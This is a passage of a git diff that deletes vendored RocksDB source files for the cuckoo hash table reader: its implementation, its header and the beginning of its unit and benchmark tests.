-namespace {
-const uint64_t CACHE_LINE_MASK = ~((uint64_t)CACHE_LINE_SIZE - 1);
-const uint32_t kInvalidIndex = std::numeric_limits<uint32_t>::max();
-}
-
-extern const uint64_t kCuckooTableMagicNumber;
-
-CuckooTableReader::CuckooTableReader(
-    const ImmutableCFOptions& ioptions,
-    std::unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-    const Comparator* comparator,
-    uint64_t (*get_slice_hash)(const Slice&, uint32_t, uint64_t))
-    : file_(std::move(file)),
-      ucomp_(comparator),
-      get_slice_hash_(get_slice_hash) {
-  if (!ioptions.allow_mmap_reads) {
-    status_ = Status::InvalidArgument("File is not mmaped");
-  }
-  TableProperties* props = nullptr;
-  status_ = ReadTableProperties(file_.get(), file_size, kCuckooTableMagicNumber,
-      ioptions, &props);
-  if (!status_.ok()) {
-    return;
-  }
-  table_props_.reset(props);
-  auto& user_props = props->user_collected_properties;
-  auto hash_funs = user_props.find(CuckooTablePropertyNames::kNumHashFunc);
-  if (hash_funs == user_props.end()) {
-    status_ = Status::Corruption("Number of hash functions not found");
-    return;
-  }
-  num_hash_func_ = *reinterpret_cast<const uint32_t*>(hash_funs->second.data());
-  auto unused_key = user_props.find(CuckooTablePropertyNames::kEmptyKey);
-  if (unused_key == user_props.end()) {
-    status_ = Status::Corruption("Empty bucket value not found");
-    return;
-  }
-  unused_key_ = unused_key->second;
-
-  key_length_ = static_cast<uint32_t>(props->fixed_key_len);
-  auto user_key_len = user_props.find(CuckooTablePropertyNames::kUserKeyLength);
-  if (user_key_len == user_props.end()) {
-    status_ = Status::Corruption("User key length not found");
-    return;
-  }
-  user_key_length_ = *reinterpret_cast<const uint32_t*>(
-      user_key_len->second.data());
-
-  auto value_length = user_props.find(CuckooTablePropertyNames::kValueLength);
-  if (value_length == user_props.end()) {
-    status_ = Status::Corruption("Value length not found");
-    return;
-  }
-  value_length_ = *reinterpret_cast<const uint32_t*>(
-      value_length->second.data());
-  bucket_length_ = key_length_ + value_length_;
-
-  auto hash_table_size = user_props.find(
-      CuckooTablePropertyNames::kHashTableSize);
-  if (hash_table_size == user_props.end()) {
-    status_ = Status::Corruption("Hash table size not found");
-    return;
-  }
-  table_size_ = *reinterpret_cast<const uint64_t*>(
-      hash_table_size->second.data());
-
-  auto is_last_level = user_props.find(CuckooTablePropertyNames::kIsLastLevel);
-  if (is_last_level == user_props.end()) {
-    status_ = Status::Corruption("Is last level not found");
-    return;
-  }
-  is_last_level_ = *reinterpret_cast<const bool*>(is_last_level->second.data());
-
-  auto identity_as_first_hash = user_props.find(
-      CuckooTablePropertyNames::kIdentityAsFirstHash);
-  if (identity_as_first_hash == user_props.end()) {
-    status_ = Status::Corruption("identity as first hash not found");
-    return;
-  }
-  identity_as_first_hash_ = *reinterpret_cast<const bool*>(
-      identity_as_first_hash->second.data());
-
-  auto use_module_hash = user_props.find(
-      CuckooTablePropertyNames::kUseModuleHash);
-  if (use_module_hash == user_props.end()) {
-    status_ = Status::Corruption("hash type is not found");
-    return;
-  }
-  use_module_hash_ = *reinterpret_cast<const bool*>(
-      use_module_hash->second.data());
-  auto cuckoo_block_size = user_props.find(
-      CuckooTablePropertyNames::kCuckooBlockSize);
-  if (cuckoo_block_size == user_props.end()) {
-    status_ = Status::Corruption("Cuckoo block size not found");
-    return;
-  }
-  cuckoo_block_size_ = *reinterpret_cast<const uint32_t*>(
-      cuckoo_block_size->second.data());
-  cuckoo_block_bytes_minus_one_ = cuckoo_block_size_ * bucket_length_ - 1;
-  status_ = file_->Read(0, file_size, &file_data_, nullptr);
-}
-
-Status CuckooTableReader::Get(const ReadOptions& readOptions, const Slice& key,
-                              GetContext* get_context, bool skip_filters) {
-  assert(key.size() == key_length_ + (is_last_level_ ? 8 : 0));
-  Slice user_key = ExtractUserKey(key);
-  for (uint32_t hash_cnt = 0; hash_cnt < num_hash_func_; ++hash_cnt) {
-    uint64_t offset = bucket_length_ * CuckooHash(
-        user_key, hash_cnt, use_module_hash_, table_size_,
-        identity_as_first_hash_, get_slice_hash_);
-    const char* bucket = &file_data_.data()[offset];
-    for (uint32_t block_idx = 0; block_idx < cuckoo_block_size_;
-         ++block_idx, bucket += bucket_length_) {
-      if (ucomp_->Equal(Slice(unused_key_.data(), user_key.size()),
-                        Slice(bucket, user_key.size()))) {
-        return Status::OK();
-      }
-      // Here, we compare only the user key part as we support only one entry
-      // per user key and we don't support snapshot.
-      if (ucomp_->Equal(user_key, Slice(bucket, user_key.size()))) {
-        Slice value(bucket + key_length_, value_length_);
-        if (is_last_level_) {
-          // Sequence number is not stored at the last level, so we will use
-          // kMaxSequenceNumber since it is unknown.  This could cause some
-          // transactions to fail to lock a key due to known sequence number.
-          // However, it is expected for anyone to use a CuckooTable in a
-          // TransactionDB.
-          get_context->SaveValue(value, kMaxSequenceNumber);
-        } else {
-          Slice full_key(bucket, key_length_);
-          ParsedInternalKey found_ikey;
-          ParseInternalKey(full_key, &found_ikey);
-          get_context->SaveValue(found_ikey, value);
-        }
-        // We don't support merge operations. So, we return here.
-        return Status::OK();
-      }
-    }
-  }
-  return Status::OK();
-}
-
-void CuckooTableReader::Prepare(const Slice& key) {
-  // Prefetch the first Cuckoo Block.
-  Slice user_key = ExtractUserKey(key);
-  uint64_t addr = reinterpret_cast<uint64_t>(file_data_.data()) +
-    bucket_length_ * CuckooHash(user_key, 0, use_module_hash_, table_size_,
-                                identity_as_first_hash_, nullptr);
-  uint64_t end_addr = addr + cuckoo_block_bytes_minus_one_;
-  for (addr &= CACHE_LINE_MASK; addr < end_addr; addr += CACHE_LINE_SIZE) {
-    PREFETCH(reinterpret_cast<const char*>(addr), 0, 3);
-  }
-}
-
-class CuckooTableIterator : public InternalIterator {
- public:
-  explicit CuckooTableIterator(CuckooTableReader* reader);
-  ~CuckooTableIterator() {}
-  bool Valid() const override;
-  void SeekToFirst() override;
-  void SeekToLast() override;
-  void Seek(const Slice& target) override;
-  void SeekForPrev(const Slice& target) override;
-  void Next() override;
-  void Prev() override;
-  Slice key() const override;
-  Slice value() const override;
-  Status status() const override { return status_; }
-  void InitIfNeeded();
-
- private:
-  struct BucketComparator {
-    BucketComparator(const Slice& file_data, const Comparator* ucomp,
-                     uint32_t bucket_len, uint32_t user_key_len,
-                     const Slice& target = Slice())
-      : file_data_(file_data),
-        ucomp_(ucomp),
-        bucket_len_(bucket_len),
-        user_key_len_(user_key_len),
-        target_(target) {}
-    bool operator()(const uint32_t first, const uint32_t second) const {
-      const char* first_bucket =
-        (first == kInvalidIndex) ? target_.data() :
-                                   &file_data_.data()[first * bucket_len_];
-      const char* second_bucket =
-        (second == kInvalidIndex) ? target_.data() :
-                                    &file_data_.data()[second * bucket_len_];
-      return ucomp_->Compare(Slice(first_bucket, user_key_len_),
-                             Slice(second_bucket, user_key_len_)) < 0;
-    }
-   private:
-    const Slice file_data_;
-    const Comparator* ucomp_;
-    const uint32_t bucket_len_;
-    const uint32_t user_key_len_;
-    const Slice target_;
-  };
-
-  const BucketComparator bucket_comparator_;
-  void PrepareKVAtCurrIdx();
-  CuckooTableReader* reader_;
-  bool initialized_;
-  Status status_;
-  // Contains a map of keys to bucket_id sorted in key order.
-  std::vector<uint32_t> sorted_bucket_ids_;
-  // We assume that the number of items can be stored in uint32 (4 Billion).
-  uint32_t curr_key_idx_;
-  Slice curr_value_;
-  IterKey curr_key_;
-  // No copying allowed
-  CuckooTableIterator(const CuckooTableIterator&) = delete;
-  void operator=(const Iterator&) = delete;
-};
-
-CuckooTableIterator::CuckooTableIterator(CuckooTableReader* reader)
-  : bucket_comparator_(reader->file_data_, reader->ucomp_,
-                       reader->bucket_length_, reader->user_key_length_),
-    reader_(reader),
-    initialized_(false),
-    curr_key_idx_(kInvalidIndex) {
-  sorted_bucket_ids_.clear();
-  curr_value_.clear();
-  curr_key_.Clear();
-}
-
-void CuckooTableIterator::InitIfNeeded() {
-  if (initialized_) {
-    return;
-  }
-  sorted_bucket_ids_.reserve(reader_->GetTableProperties()->num_entries);
-  uint64_t num_buckets = reader_->table_size_ + reader_->cuckoo_block_size_ - 1;
-  assert(num_buckets < kInvalidIndex);
-  const char* bucket = reader_->file_data_.data();
-  for (uint32_t bucket_id = 0; bucket_id < num_buckets; ++bucket_id) {
-    if (Slice(bucket, reader_->key_length_) != Slice(reader_->unused_key_)) {
-      sorted_bucket_ids_.push_back(bucket_id);
-    }
-    bucket += reader_->bucket_length_;
-  }
-  assert(sorted_bucket_ids_.size() ==
-      reader_->GetTableProperties()->num_entries);
-  std::sort(sorted_bucket_ids_.begin(), sorted_bucket_ids_.end(),
-            bucket_comparator_);
-  curr_key_idx_ = kInvalidIndex;
-  initialized_ = true;
-}
-
-void CuckooTableIterator::SeekToFirst() {
-  InitIfNeeded();
-  curr_key_idx_ = 0;
-  PrepareKVAtCurrIdx();
-}
-
-void CuckooTableIterator::SeekToLast() {
-  InitIfNeeded();
-  curr_key_idx_ = static_cast<uint32_t>(sorted_bucket_ids_.size()) - 1;
-  PrepareKVAtCurrIdx();
-}
-
-void CuckooTableIterator::Seek(const Slice& target) {
-  InitIfNeeded();
-  const BucketComparator seek_comparator(
-      reader_->file_data_, reader_->ucomp_,
-      reader_->bucket_length_, reader_->user_key_length_,
-      ExtractUserKey(target));
-  auto seek_it = std::lower_bound(sorted_bucket_ids_.begin(),
-      sorted_bucket_ids_.end(),
-      kInvalidIndex,
-      seek_comparator);
-  curr_key_idx_ =
-      static_cast<uint32_t>(std::distance(sorted_bucket_ids_.begin(), seek_it));
-  PrepareKVAtCurrIdx();
-}
-
-void CuckooTableIterator::SeekForPrev(const Slice& target) {
-  // Not supported
-  assert(false);
-}
-
-bool CuckooTableIterator::Valid() const {
-  return curr_key_idx_ < sorted_bucket_ids_.size();
-}
-
-void CuckooTableIterator::PrepareKVAtCurrIdx() {
-  if (!Valid()) {
-    curr_value_.clear();
-    curr_key_.Clear();
-    return;
-  }
-  uint32_t id = sorted_bucket_ids_[curr_key_idx_];
-  const char* offset = reader_->file_data_.data() +
-                       id * reader_->bucket_length_;
-  if (reader_->is_last_level_) {
-    // Always return internal key.
-    curr_key_.SetInternalKey(Slice(offset, reader_->user_key_length_),
-                             0, kTypeValue);
-  } else {
-    curr_key_.SetInternalKey(Slice(offset, reader_->key_length_));
-  }
-  curr_value_ = Slice(offset + reader_->key_length_, reader_->value_length_);
-}
-
-void CuckooTableIterator::Next() {
-  if (!Valid()) {
-    curr_value_.clear();
-    curr_key_.Clear();
-    return;
-  }
-  ++curr_key_idx_;
-  PrepareKVAtCurrIdx();
-}
-
-void CuckooTableIterator::Prev() {
-  if (curr_key_idx_ == 0) {
-    curr_key_idx_ = static_cast<uint32_t>(sorted_bucket_ids_.size());
-  }
-  if (!Valid()) {
-    curr_value_.clear();
-    curr_key_.Clear();
-    return;
-  }
-  --curr_key_idx_;
-  PrepareKVAtCurrIdx();
-}
-
-Slice CuckooTableIterator::key() const {
-  assert(Valid());
-  return curr_key_.GetInternalKey();
-}
-
-Slice CuckooTableIterator::value() const {
-  assert(Valid());
-  return curr_value_;
-}
-
-extern InternalIterator* NewErrorInternalIterator(const Status& status,
-                                                  Arena* arena);
-
-InternalIterator* CuckooTableReader::NewIterator(
-    const ReadOptions& read_options, Arena* arena, bool skip_filters) {
-  if (!status().ok()) {
-    return NewErrorInternalIterator(
-        Status::Corruption("CuckooTableReader status is not okay."), arena);
-  }
-  CuckooTableIterator* iter;
-  if (arena == nullptr) {
-    iter = new CuckooTableIterator(this);
-  } else {
-    auto iter_mem = arena->AllocateAligned(sizeof(CuckooTableIterator));
-    iter = new (iter_mem) CuckooTableIterator(this);
-  }
-  return iter;
-}
-
-size_t CuckooTableReader::ApproximateMemoryUsage() const { return 0; }
-
-}  // namespace rocksdb
-#endif
diff --git a/thirdparty/rocksdb/table/cuckoo_table_reader.h b/thirdparty/rocksdb/table/cuckoo_table_reader.h
deleted file mode 100644
index 4beac8f..0000000
--- a/thirdparty/rocksdb/table/cuckoo_table_reader.h
+++ /dev/null
@@ -1,86 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#ifndef ROCKSDB_LITE
-#include <string>
-#include <memory>
-#include <utility>
-#include <vector>
-
-#include "db/dbformat.h"
-#include "options/cf_options.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "table/table_reader.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-class Arena;
-class TableReader;
-class InternalIterator;
-
-class CuckooTableReader: public TableReader {
- public:
-  CuckooTableReader(const ImmutableCFOptions& ioptions,
-                    std::unique_ptr<RandomAccessFileReader>&& file,
-                    uint64_t file_size, const Comparator* user_comparator,
-                    uint64_t (*get_slice_hash)(const Slice&, uint32_t,
-                                               uint64_t));
-  ~CuckooTableReader() {}
-
-  std::shared_ptr<const TableProperties> GetTableProperties() const override {
-    return table_props_;
-  }
-
-  Status status() const { return status_; }
-
-  Status Get(const ReadOptions& read_options, const Slice& key,
-             GetContext* get_context, bool skip_filters = false) override;
-
-  InternalIterator* NewIterator(
-      const ReadOptions&, Arena* arena = nullptr,
-      bool skip_filters = false) override;
-  void Prepare(const Slice& target) override;
-
-  // Report an approximation of how much memory has been used.
-  size_t ApproximateMemoryUsage() const override;
-
-  // Following methods are not implemented for Cuckoo Table Reader
-  uint64_t ApproximateOffsetOf(const Slice& key) override { return 0; }
-  void SetupForCompaction() override {}
-  // End of methods not implemented.
-
- private:
-  friend class CuckooTableIterator;
-  void LoadAllKeys(std::vector<std::pair<Slice, uint32_t>>* key_to_bucket_id);
-  std::unique_ptr<RandomAccessFileReader> file_;
-  Slice file_data_;
-  bool is_last_level_;
-  bool identity_as_first_hash_;
-  bool use_module_hash_;
-  std::shared_ptr<const TableProperties> table_props_;
-  Status status_;
-  uint32_t num_hash_func_;
-  std::string unused_key_;
-  uint32_t key_length_;
-  uint32_t user_key_length_;
-  uint32_t value_length_;
-  uint32_t bucket_length_;
-  uint32_t cuckoo_block_size_;
-  uint32_t cuckoo_block_bytes_minus_one_;
-  uint64_t table_size_;
-  const Comparator* ucomp_;
-  uint64_t (*get_slice_hash_)(const Slice& s, uint32_t index,
-      uint64_t max_num_buckets);
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/cuckoo_table_reader_test.cc b/thirdparty/rocksdb/table/cuckoo_table_reader_test.cc
deleted file mode 100644
index 7e131e5..0000000
--- a/thirdparty/rocksdb/table/cuckoo_table_reader_test.cc
+++ /dev/null
@@ -1,568 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run this test... Skipping...\n");
-  return 0;
-}
-#else
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <gflags/gflags.h>
-#include <vector>
-#include <string>
-#include <map>
-
-#include "table/meta_blocks.h"
-#include "table/cuckoo_table_builder.h"
-#include "table/cuckoo_table_reader.h"
-#include "table/cuckoo_table_factory.h"
-#include "table/get_context.h"
-#include "util/arena.h"
-#include "util/random.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-using GFLAGS::ParseCommandLineFlags;
-using GFLAGS::SetUsageMessage;
-
-DEFINE_string(file_dir, "", "Directory where the files will be created"
-    " for benchmark. Added for using tmpfs.");
-DEFINE_bool(enable_perf, false, "Run Benchmark Tests too.");
-DEFINE_bool(write, false,
-    "Should write new values to file in performance tests?");
-DEFINE_bool(identity_as_first_hash, true, "use identity as first hash");
-
-namespace rocksdb {
-
-namespace {
-const uint32_t kNumHashFunc = 10;
-// Methods, variables related to Hash functions.
-std::unordered_map<std::string, std::vector<uint64_t>> hash_map;
-
-void AddHashLookups(const std::string& s, uint64_t bucket_id,
-        uint32_t num_hash_fun) {
-  std::vector<uint64_t> v;
-  for (uint32_t i = 0; i < num_hash_fun; i++) {
-    v.push_back(bucket_id + i);
-  }
-  hash_map[s] = v;
-}
-
-uint64_t GetSliceHash(const Slice& s, uint32_t index,
-    uint64_t max_num_buckets) {
-  return hash_map[s.ToString()][index];
-}
-}  // namespace
-
-class CuckooReaderTest : public testing::Test {
- public:
-  using testing::Test::SetUp;
-
-  CuckooReaderTest() {
-    options.allow_mmap_reads = true;
-    env = options.env;
-    env_options = EnvOptions(options);
-  }
-
-  void SetUp(int num) {
-    num_items = num;
-    hash_map.clear();
-    keys.clear();
-    keys.resize(num_items);
-    user_keys.clear();
-    user_keys.resize(num_items);
-    values.clear();
-    values.resize(num_items);
-  }
-
-  std::string NumToStr(int64_t i) {
-    return std::string(reinterpret_cast<char*>(&i), sizeof(i));
-  }
-
-  void CreateCuckooFileAndCheckReader(
-      const Comparator* ucomp = BytewiseComparator()) {
-    std::unique_ptr<WritableFile> writable_file;
-    ASSERT_OK(env->NewWritableFile(fname, &writable_file, env_options));
-    unique_ptr<WritableFileWriter> file_writer(
-        new WritableFileWriter(std::move(writable_file), env_options));
-
-    CuckooTableBuilder builder(
-        file_writer.get(), 0.9, kNumHashFunc, 100, ucomp, 2, false, false,
-        GetSliceHash, 0 /* column_family_id */, kDefaultColumnFamilyName);
-    ASSERT_OK(builder.status());
-    for (uint32_t key_idx = 0; key_idx < num_items; ++key_idx) {
-      builder.Add(Slice(keys[key_idx]), Slice(values[key_idx]));
-      ASSERT_OK(builder.status());
-      ASSERT_EQ(builder.NumEntries(), key_idx + 1);
-    }
-    ASSERT_OK(builder.Finish());
-    ASSERT_EQ(num_items, builder.NumEntries());
-    file_size = builder.FileSize();
-    ASSERT_OK(file_writer->Close());
-
-    // Check reader now.
-    std::unique_ptr<RandomAccessFile> read_file;
-    ASSERT_OK(env->NewRandomAccessFile(fname, &read_file, env_options));
-    unique_ptr<RandomAccessFileReader> file_reader(
-        new RandomAccessFileReader(std::move(read_file), fname));
-    const ImmutableCFOptions ioptions(options);
-    CuckooTableReader reader(ioptions, std::move(file_reader), file_size, ucomp,
-                             GetSliceHash);
-    ASSERT_OK(reader.status());
-    // Assume no merge/deletion
-    for (uint32_t i = 0; i < num_items; ++i) {
-      PinnableSlice value;
-      GetContext get_context(ucomp, nullptr, nullptr, nullptr,
-                             GetContext::kNotFound, Slice(user_keys[i]), &value,
-                             nullptr, nullptr, nullptr, nullptr);
-      ASSERT_OK(reader.Get(ReadOptions(), Slice(keys[i]), &get_context));
-      ASSERT_STREQ(values[i].c_str(), value.data());
-    }
-  }
-  void UpdateKeys(bool with_zero_seqno) {
-    for (uint32_t i = 0; i < num_items; i++) {
-      ParsedInternalKey ikey(user_keys[i],
-          with_zero_seqno ? 0 : i + 1000, kTypeValue);
-      keys[i].clear();
-      AppendInternalKey(&keys[i], ikey);
-    }
-  }
-
-  void CheckIterator(const Comparator* ucomp = BytewiseComparator()) {
-    std::unique_ptr<RandomAccessFile> read_file;
-    ASSERT_OK(env->NewRandomAccessFile(fname, &read_file, env_options));
-    unique_ptr<RandomAccessFileReader> file_reader(
-        new RandomAccessFileReader(std::move(read_file), fname));
-    const ImmutableCFOptions ioptions(options);
-    CuckooTableReader reader(ioptions, std::move(file_reader), file_size, ucomp,
-                             GetSliceHash);
-    ASSERT_OK(reader.status());
-    InternalIterator* it = reader.NewIterator(ReadOptions(), nullptr);
-    ASSERT_OK(it->status());
-    ASSERT_TRUE(!it->Valid());
-    it->SeekToFirst();
-    int cnt = 0;
-    while (it->Valid()) {
-      ASSERT_OK(it->status());
-      ASSERT_TRUE(Slice(keys[cnt]) == it->key());
-      ASSERT_TRUE(Slice(values[cnt]) == it->value());
-      ++cnt;
-      it->Next();
-    }
-    ASSERT_EQ(static_cast<uint32_t>(cnt), num_items);
-
-    it->SeekToLast();
-    cnt = static_cast<int>(num_items) - 1;
-    ASSERT_TRUE(it->Valid());
-    while (it->Valid()) {
-      ASSERT_OK(it->status());
-      ASSERT_TRUE(Slice(keys[cnt]) == it->key());
-      ASSERT_TRUE(Slice(values[cnt]) == it->value());
-      --cnt;
-      it->Prev();
-    }
-    ASSERT_EQ(cnt, -1);
-
-    cnt = static_cast<int>(num_items) / 2;
-    it->Seek(keys[cnt]);
-    while (it->Valid()) {
-      ASSERT_OK(it->status());
-      ASSERT_TRUE(Slice(keys[cnt]) == it->key());
-      ASSERT_TRUE(Slice(values[cnt]) == it->value());
-      ++cnt;
-      it->Next();
-    }
-    ASSERT_EQ(static_cast<uint32_t>(cnt), num_items);
-    delete it;
-
-    Arena arena;
-    it = reader.NewIterator(ReadOptions(), &arena);
-    ASSERT_OK(it->status());
-    ASSERT_TRUE(!it->Valid());
-    it->Seek(keys[num_items/2]);
-    ASSERT_TRUE(it->Valid());
-    ASSERT_OK(it->status());
-    ASSERT_TRUE(keys[num_items/2] == it->key());
-    ASSERT_TRUE(values[num_items/2] == it->value());
-    ASSERT_OK(it->status());
-    it->~InternalIterator();
-  }
-
-  std::vector<std::string> keys;
-  std::vector<std::string> user_keys;
-  std::vector<std::string> values;
-  uint64_t num_items;
-  std::string fname;
-  uint64_t file_size;
-  Options options;
-  Env* env;
-  EnvOptions env_options;
-};
-
-TEST_F(CuckooReaderTest, WhenKeyExists) {
-  SetUp(kNumHashFunc);
-  fname = test::TmpDir() + "/CuckooReader_WhenKeyExists";
-  for (uint64_t i = 0; i < num_items; i++) {
-    user_keys[i] = "key" + NumToStr(i);
-    ParsedInternalKey ikey(user_keys[i], i + 1000, kTypeValue);
-    AppendInternalKey(&keys[i], ikey);
-    values[i] = "value" + NumToStr(i);
-    // Give disjoint hash values.
-    AddHashLookups(user_keys[i], i, kNumHashFunc);
-  }
-  CreateCuckooFileAndCheckReader();
-  // Last level file.
-  UpdateKeys(true);
-  CreateCuckooFileAndCheckReader();
-  // Test with collision. Make all hash values collide.
-  hash_map.clear();
-  for (uint32_t i = 0; i < num_items; i++) {
-    AddHashLookups(user_keys[i], 0, kNumHashFunc);
-  }
-  UpdateKeys(false);
-  CreateCuckooFileAndCheckReader();
-  // Last level file.
-  UpdateKeys(true);
-  CreateCuckooFileAndCheckReader();
-}
-
-TEST_F(CuckooReaderTest, WhenKeyExistsWithUint64Comparator) {
-  SetUp(kNumHashFunc);
-  fname = test::TmpDir() + "/CuckooReaderUint64_WhenKeyExists";
-  for (uint64_t i = 0; i < num_items; i++) {
-    user_keys[i].resize(8);
-    memcpy(&user_keys[i][0], static_cast<void*>(&i), 8);
-    ParsedInternalKey ikey(user_keys[i], i + 1000, kTypeValue);
-    AppendInternalKey(&keys[i], ikey);
-    values[i] = "value" + NumToStr(i);
-    // Give disjoint hash values.
-    AddHashLookups(user_keys[i], i, kNumHashFunc);
-  }
-  CreateCuckooFileAndCheckReader(test::Uint64Comparator());
-  // Last level file.
-  UpdateKeys(true);
-  CreateCuckooFileAndCheckReader(test::Uint64Comparator());
-  // Test with collision. Make all hash values collide.
-  hash_map.clear();
-  for (uint32_t i = 0; i < num_items; i++) {
-    AddHashLookups(user_keys[i], 0, kNumHashFunc);
-  }
-  UpdateKeys(false);
-  CreateCuckooFileAndCheckReader(test::Uint64Comparator());
-  // Last level file.
-  UpdateKeys(true);
-  CreateCuckooFileAndCheckReader(test::Uint64Comparator());
-}
-
-TEST_F(CuckooReaderTest, CheckIterator) {
-  SetUp(2*kNumHashFunc);
-  fname = test::TmpDir() + "/CuckooReader_CheckIterator";
-  for (uint64_t i = 0; i < num_items; i++) {
-    user_keys[i] = "key" + NumToStr(i);
-    ParsedInternalKey ikey(user_keys[i], 1000, kTypeValue);
-    AppendInternalKey(&keys[i], ikey);
-    values[i] = "value" + NumToStr(i);
-    // Give disjoint hash values, in reverse order.
-    AddHashLookups(user_keys[i], num_items-i-1, kNumHashFunc);
-  }
-  CreateCuckooFileAndCheckReader();
-  CheckIterator();
-  // Last level file.
-  UpdateKeys(true);
-  CreateCuckooFileAndCheckReader();
-  CheckIterator();
-}
-
-TEST_F(CuckooReaderTest, CheckIteratorUint64) {
-  SetUp(2*kNumHashFunc);
-  fname = test::TmpDir() + "/CuckooReader_CheckIterator";
-  for (uint64_t i = 0; i < num_items; i++) {
-    user_keys[i].resize(8);
-    memcpy(&user_keys[i][0], static_cast<void*>(&i), 8);
-    ParsedInternalKey ikey(user_keys[i], 1000, kTypeValue);
-    AppendInternalKey(&keys[i], ikey);
-    values[i] = "value" + NumToStr(i);
-    // Give disjoint hash values, in reverse order.
-    AddHashLookups(user_keys[i], num_items-i-1, kNumHashFunc);
-  }
-  CreateCuckooFileAndCheckReader(test::Uint64Comparator());
-  CheckIterator(test::Uint64Comparator());
-  // Last level file.
-  UpdateKeys(true);
-  CreateCuckooFileAndCheckReader(test::Uint64Comparator());
-  CheckIterator(test::Uint64Comparator());
-}
-
-TEST_F(CuckooReaderTest, WhenKeyNotFound) {
-  // Add keys with colliding hash values.
-  SetUp(kNumHashFunc);
-  fname = test::TmpDir() + "/CuckooReader_WhenKeyNotFound";
-  for (uint64_t i = 0; i < num_items; i++) {
-    user_keys[i] = "key" + NumToStr(i);
-    ParsedInternalKey ikey(user_keys[i], i + 1000, kTypeValue);
-    AppendInternalKey(&keys[i], ikey);
-    values[i] = "value" + NumToStr(i);
-    // Make all hash values collide.
-    AddHashLookups(user_keys[i], 0, kNumHashFunc);
-  }
-  auto* ucmp = BytewiseComparator();
-  CreateCuckooFileAndCheckReader();
-  std::unique_ptr<RandomAccessFile> read_file;
-  ASSERT_OK(env->NewRandomAccessFile(fname, &read_file, env_options));
-  unique_ptr<RandomAccessFileReader> file_reader(
-      new RandomAccessFileReader(std::move(read_file), fname));
-  const ImmutableCFOptions ioptions(options);
-  CuckooTableReader reader(ioptions, std::move(file_reader), file_size, ucmp,
-                           GetSliceHash);
-  ASSERT_OK(reader.status());
-  // Search for a key with colliding hash values.
-  std::string not_found_user_key = "key" + NumToStr(num_items);
-  std::string not_found_key;
-  AddHashLookups(not_found_user_key, 0, kNumHashFunc);
-  ParsedInternalKey ikey(not_found_user_key, 1000, kTypeValue);
-  AppendInternalKey(&not_found_key, ikey);
-  PinnableSlice value;
-  GetContext get_context(ucmp, nullptr, nullptr, nullptr, GetContext::kNotFound,
-                         Slice(not_found_key), &value, nullptr, nullptr,
-                         nullptr, nullptr);
-  ASSERT_OK(reader.Get(ReadOptions(), Slice(not_found_key), &get_context));
-  ASSERT_TRUE(value.empty());
-  ASSERT_OK(reader.status());
-  // Search for a key with an independent hash value.
-  std::string not_found_user_key2 = "key" + NumToStr(num_items + 1);
-  AddHashLookups(not_found_user_key2, kNumHashFunc, kNumHashFunc);
-  ParsedInternalKey ikey2(not_found_user_key2, 1000, kTypeValue);
-  std::string not_found_key2;
-  AppendInternalKey(&not_found_key2, ikey2);
-  value.Reset();
-  GetContext get_context2(ucmp, nullptr, nullptr, nullptr,
-                          GetContext::kNotFound, Slice(not_found_key2), &value,
-                          nullptr, nullptr, nullptr, nullptr);
-  ASSERT_OK(reader.Get(ReadOptions(), Slice(not_found_key2), &get_context2));
-  ASSERT_TRUE(value.empty());
-  ASSERT_OK(reader.status());
-
-  // Test read when key is unused key.
-  std::string unused_key =
-    reader.GetTableProperties()->user_collected_properties.at(
-    CuckooTablePropertyNames::kEmptyKey);
-  // Add hash values that map to empty buckets.
-  AddHashLookups(ExtractUserKey(unused_key).ToString(),
-      kNumHashFunc, kNumHashFunc);
-  value.Reset();
-  GetContext get_context3(ucmp, nullptr, nullptr, nullptr,
-                          GetContext::kNotFound, Slice(unused_key), &value,
-                          nullptr, nullptr, nullptr, nullptr);
-  ASSERT_OK(reader.Get(ReadOptions(), Slice(unused_key), &get_context3));
-  ASSERT_TRUE(value.empty());
-  ASSERT_OK(reader.status());
-}
-
-// Performance tests
-namespace {
-void GetKeys(uint64_t num, std::vector<std::string>* keys) {
-  keys->clear();
-  IterKey k;
-  k.SetInternalKey("", 0, kTypeValue);
-  std::string internal_key_suffix = k.GetInternalKey().ToString();
-  ASSERT_EQ(static_cast<size_t>(8), internal_key_suffix.size());
-  for (uint64_t key_idx = 0; key_idx < num; ++key_idx) {
-    uint64_t value = 2 * key_idx;
-    std::string new_key(reinterpret_cast<char*>(&value), sizeof(value));
-    new_key += internal_key_suffix;
-    keys->push_back(new_key);
-  }
-}
-
-std::string GetFileName(uint64_t num) {
-  if (FLAGS_file_dir.empty()) {
-    FLAGS_file_dir = test::TmpDir();
-  }
-  return FLAGS_file_dir + "/cuckoo_read_benchmark" +
-    ToString(num/1000000) + "Mkeys";
-}
-
-// Create last level file as we are interested in measuring performance of
-// last level file only.
-void WriteFile(const std::vector<std::string>& keys,
-    const uint64_t num, double hash_ratio) {
-  Options options;
-  options.allow_mmap_reads = true;
-  Env* env = options.env;
-  EnvOptions env_options = EnvOptions(options);
-  std::string fname = GetFileName(num);
-
-  std::unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(env->NewWritableFile(fname, &writable_file, env_options));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), env_options));
-  CuckooTableBuilder builder(
-      file_writer.get(), hash_ratio, 64, 1000, test::Uint64Comparator(), 5,
-      false, FLAGS_identity_as_first_hash, nullptr, 0 /* column_family_id */,
